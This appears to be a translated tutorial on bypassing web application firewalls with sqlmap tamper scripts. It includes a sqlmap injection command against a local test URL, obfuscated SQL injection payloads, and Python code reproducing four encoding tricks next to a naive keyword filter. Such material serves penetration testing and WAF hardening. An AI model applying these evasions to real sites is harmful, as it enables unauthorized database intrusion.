How to Use sqlmap to bypass WAF


Author: bugcx or anonymous

WAF (Web application firewall) has gradually become one of the standard security solutions; with one in place, many companies stop caring about vulnerabilities in the Web application itself. Unfortunately, not every WAF is impossible to bypass. This article shows how to use the sqlmap injection tool to bypass WAFs/IDSs.

Download the latest version of sqlmap from SVN:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
(sqlmap has since moved to Git; the same tamper directory exists in the GitHub repository at https://github.com/sqlmapproject/sqlmap.)

Our focus is using tamper scripts to modify requests so that they evade WAF rule detection. In many cases you need to use several tamper scripts together; sqlmap accepts them as a comma-separated list in a single --tamper option.
All tamper scripts are listed at https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

Here we take space2hash.py and space2morehash.py for MySQL as examples. Both scripts replace every space with a random MySQL comment (%23<random>%0A, i.e. a '#' line comment terminated by a newline); the extended version, space2morehash.py, additionally "disrupts" function calls by inserting such a comment between a function name and its opening parenthesis, to evade WAF detection.

Example:
* Input: 1 and 9227=9227
* Output: 1%23pttmjopxdwj%0Aand%23cwfcvrpv%0A9227=9227

Now let's focus on it.

You can call a script with the --tamper option, as shown below:

./sqlmap.py -u "http://127.0.0.1/test.php?id=1" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

We can see that each space in the request is replaced with %23randomtext%0A (URL-encoded), and function calls such as char(), user() and concat() are rewritten as function%23randomtext%0A().

There are two other space replacement scripts, space2mssqlblank.py and space2mysqlblank.py, shown in the figure; they replace spaces with other blank characters that the respective DBMS accepts instead of with comments.

charencode.py and chardoubleencode.py are two tamper scripts that disrupt the encoding: the first URL-encodes every character of the payload, the second URL-encodes it twice. They help bypass different kinds of keyword filtering.

If the web application is developed in ASP/ASP.NET, charunicodeencode.py and percentage.py can help you escape WAF detection.

Interestingly, ASP tolerates extra % signs between characters: for example, and 1=%1 is valid!
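The four encoding tamper scripts from the last three paragraphs, written out as one added example (not sqlmap's own code). Each encoder is paired with a decoder that models what the server side sees, so you can check that the payload survives; the unicode and stray-percent decoders are assumptions that model the ASP/ASP.NET behaviour the article describes, not a reference for IIS. The keyword filter is constructed to show the point of the technique: it matches the raw parameter value without decoding, which is exactly the kind of filter these scripts defeat.

```python
import re
from urllib.parse import unquote

_HEX = "0123456789abcdefABCDEF"


def _tokens(payload):
    """Yield ('%XX', True) for triples that are already URL-encoded, otherwise
    (single character, False), so encoders never double-encode by accident."""
    i = 0
    while i < len(payload):
        if payload[i] == "%" and i + 2 < len(payload) and payload[i + 1] in _HEX and payload[i + 2] in _HEX:
            yield payload[i:i + 3], True
            i += 3
        else:
            yield payload[i], False
            i += 1


def charencode(payload):
    """charencode.py: URL-encode every character (ASCII payloads assumed)."""
    return "".join(tok if enc else "%%%02X" % ord(tok) for tok, enc in _tokens(payload))


def chardoubleencode(payload):
    """chardoubleencode.py: URL-encode twice; an existing %XX becomes %25XX."""
    return "".join("%25" + tok[1:] if enc else "%%25%02X" % ord(tok) for tok, enc in _tokens(payload))


def charunicodeencode(payload):
    """charunicodeencode.py: the %uXXXX form understood by ASP/ASP.NET."""
    return "".join("%u00" + tok[1:].upper() if enc else "%%u%04X" % ord(tok) for tok, enc in _tokens(payload))


def percentage(payload):
    """percentage.py: a '%' in front of every non-space character."""
    return "".join(tok if enc or tok == " " else "%" + tok for tok, enc in _tokens(payload))


def url_decode(value, times=1):
    """What a server sees after one (or more) rounds of URL decoding."""
    for _ in range(times):
        value = unquote(value)
    return value


def asp_unicode_decode(value):
    """Assumption: %uXXXX is decoded to the character, then ordinary %XX
    decoding applies (a model of ASP/ASP.NET request parsing)."""
    return unquote(re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), value))


def asp_drop_stray_percent(value):
    """Assumption: a '%' not followed by two hex digits is dropped, which is
    the behaviour the article relies on for 'and 1=%1'."""
    return unquote(re.sub(r"%(?![0-9A-Fa-f]{2})", "", value))


# Constructed keyword filter that inspects the raw parameter value only.
KEYWORD_RULE = re.compile(r"\b(select|union|and|or)\b", re.IGNORECASE)


def naive_filter_blocks(raw_value):
    return KEYWORD_RULE.search(raw_value) is not None


if __name__ == "__main__":
    for name, enc, dec in (
        ("charencode", charencode, url_decode),
        ("chardoubleencode", chardoubleencode, lambda v: url_decode(v, 2)),
        ("charunicodeencode", charunicodeencode, asp_unicode_decode),
        ("percentage", percentage, asp_drop_stray_percent),
    ):
        sent = enc("AND 1=1")
        print("%-18s %-40s server sees %r filter %s" % (name, sent, dec(sent), naive_filter_blocks(sent)))
```

Note the difference in what the two URL-encoding scripts require: charencode only defeats a filter that never decodes, while chardoubleencode survives one decoding round (the WAF's) and still reaches the application as a plain payload only if the application decodes a second time. A WAF that normalises as many times as the backend does sees the same keywords you started with.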

Summary:

Some representative tamper scripts are listed above to help us bypass WAFs. Each script has its own use scenario and needs to be used flexibly.
Text: Robert Salgado / [freebuf]. Thanks.
